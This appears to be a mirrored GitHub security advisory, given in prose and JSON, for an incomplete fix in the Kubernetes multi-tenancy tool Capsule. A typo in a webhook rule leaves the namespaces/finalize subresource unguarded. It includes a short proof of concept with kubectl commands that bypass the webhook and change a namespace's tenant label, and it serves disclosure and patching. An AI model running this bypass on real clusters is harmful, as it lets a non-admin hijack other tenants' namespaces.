GHSA-GWXR-7H77-7777

Vulnerability from github – Published: 2026-06-17 18:14 – Updated: 2026-06-17 18:14
VLAI
Summary
Capsule: Incomplete fix of CVE-2026-30963: singular/plural typo leaves namespaces/finalize unprotected
Details

Summary

Capsule v0.13.2 webhook rules contain namespace/finalize (singular) instead of namespaces/finalize (plural). K8s requires plural. The finalize defense from CVE-2026-30963 fix is absent.

Details

PUT to /api/v1/namespaces/<ns>/finalize has resource=namespaces (plural). The singular rule never matches. matchPolicy: Equivalent does not compensate.

PoC

Confirmed on kind + Capsule v0.13.2. alice (non-admin with namespaces/finalize RBAC): kubectl label --as=alice = DENIED (control). kubectl replace --raw /finalize --as=alice = 200 OK (bypass). Tenant label changed.

Impact

Namespace tenant-label hijack. Same threat model as CVE-2026-30963. One-char fix: namespace/finalize -> namespaces/finalize. The CVE-2026-30963 fix in Capsule v0.13.2 added subresource entries to the namespace validating webhook, but charts/capsule/templates/configuration.yaml line 105 contains a singular/plural typo: namespace/finalize instead of namespaces/finalize. Kubernetes webhook rules require the plural resource name. The finalize subresource defense is entirely absent.

Details

In Kubernetes admission webhooks, rules.resources matches against the plural resource name. A PUT to /api/v1/namespaces/<ns>/finalize has resource=namespaces (plural). The rule namespace/finalize (singular) never matches any real API request.

The matchPolicy: Equivalent setting does NOT compensate (it handles API group/version variations, not resource name typos).

PoC

Confirmed on kind cluster + Capsule v0.13.2 (Helm chart):

# Setup: alice with namespaces/finalize RBAC
kubectl apply -f - <<EOF
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: ns-finalize-updater
rules:
- apiGroups: [""]
-   resources: ["namespaces/finalize"]
-   verbs: ["update"]
- - apiGroups: [""]
-   resources: ["namespaces"]
-   verbs: ["get", "list"]
- EOF
- kubectl create clusterrolebinding alice-finalize --clusterrole=ns-finalize-updater --user=alice
# Control: normal label change DENIED
kubectl label namespace oil-prod capsule.clastix.io/tenant=evil --overwrite --as=alice
# Error: admission webhook denied

# Bypass: finalize changes tenant label (webhook NOT invoked)
kubectl get namespace oil-prod -o json > /tmp/ns.json
# modify tenant label to "hijacked"
kubectl replace --raw "/api/v1/namespaces/oil-prod/finalize" -f /tmp/ns_modified.json --as=alice
# 200 OK - tenant label changed

Impact

Namespace tenant-label hijack via the finalize subresource bypass. Same threat model as CVE-2026-30963. One-character fix needed: namespace/finalize -> namespaces/finalize.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/projectcapsule/capsule"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.13.0"
            },
            {
              "fixed": "0.13.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-55636"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-17T18:14:12Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\nCapsule v0.13.2 webhook rules contain `namespace/finalize` (singular) instead of `namespaces/finalize` (plural). K8s requires plural. The finalize defense from CVE-2026-30963 fix is absent.\n\n### Details\nPUT to `/api/v1/namespaces/\u003cns\u003e/finalize` has resource=namespaces (plural). The singular rule never matches. `matchPolicy: Equivalent` does not compensate.\n\n### PoC\nConfirmed on kind + Capsule v0.13.2. alice (non-admin with namespaces/finalize RBAC): `kubectl label --as=alice` = DENIED (control). `kubectl replace --raw /finalize --as=alice` = 200 OK (bypass). Tenant label changed.\n\n### Impact\nNamespace tenant-label hijack. Same threat model as CVE-2026-30963. One-char fix: `namespace/finalize` -\u003e `namespaces/finalize`.\nThe CVE-2026-30963 fix in Capsule v0.13.2 added subresource entries to the namespace validating webhook, but `charts/capsule/templates/configuration.yaml` line 105 contains a singular/plural typo: `namespace/finalize` instead of `namespaces/finalize`. Kubernetes webhook rules require the plural resource name. The finalize subresource defense is entirely absent.\n\n### Details\nIn Kubernetes admission webhooks, `rules.resources` matches against the plural resource name. A PUT to `/api/v1/namespaces/\u003cns\u003e/finalize` has `resource=namespaces` (plural). The rule `namespace/finalize` (singular) never matches any real API request.\n\nThe `matchPolicy: Equivalent` setting does NOT compensate (it handles API group/version variations, not resource name typos).\n\n### PoC\nConfirmed on kind cluster + Capsule v0.13.2 (Helm chart):\n```bash\n# Setup: alice with namespaces/finalize RBAC\nkubectl apply -f - \u003c\u003cEOF\napiVersion: rbac.authorization.k8s.io/v1\nkind: ClusterRole\nmetadata:\n  name: ns-finalize-updater\nrules:\n- apiGroups: [\"\"]\n-   resources: [\"namespaces/finalize\"]\n-   verbs: [\"update\"]\n- - apiGroups: [\"\"]\n-   resources: [\"namespaces\"]\n-   verbs: [\"get\", \"list\"]\n- EOF\n- kubectl create clusterrolebinding alice-finalize --clusterrole=ns-finalize-updater --user=alice\n# Control: normal label change DENIED\nkubectl label namespace oil-prod capsule.clastix.io/tenant=evil --overwrite --as=alice\n# Error: admission webhook denied\n\n# Bypass: finalize changes tenant label (webhook NOT invoked)\nkubectl get namespace oil-prod -o json \u003e /tmp/ns.json\n# modify tenant label to \"hijacked\"\nkubectl replace --raw \"/api/v1/namespaces/oil-prod/finalize\" -f /tmp/ns_modified.json --as=alice\n# 200 OK - tenant label changed\n```\n\n### Impact\nNamespace tenant-label hijack via the finalize subresource bypass. Same threat model as CVE-2026-30963. One-character fix needed: `namespace/finalize` -\u003e `namespaces/finalize`.",
  "id": "GHSA-gwxr-7h77-7777",
  "modified": "2026-06-17T18:14:12Z",
  "published": "2026-06-17T18:14:12Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/projectcapsule/capsule/security/advisories/GHSA-gwxr-7h77-7777"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/projectcapsule/capsule"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:H/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Capsule: Incomplete fix of CVE-2026-30963: singular/plural typo leaves namespaces/finalize unprotected"
}



Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…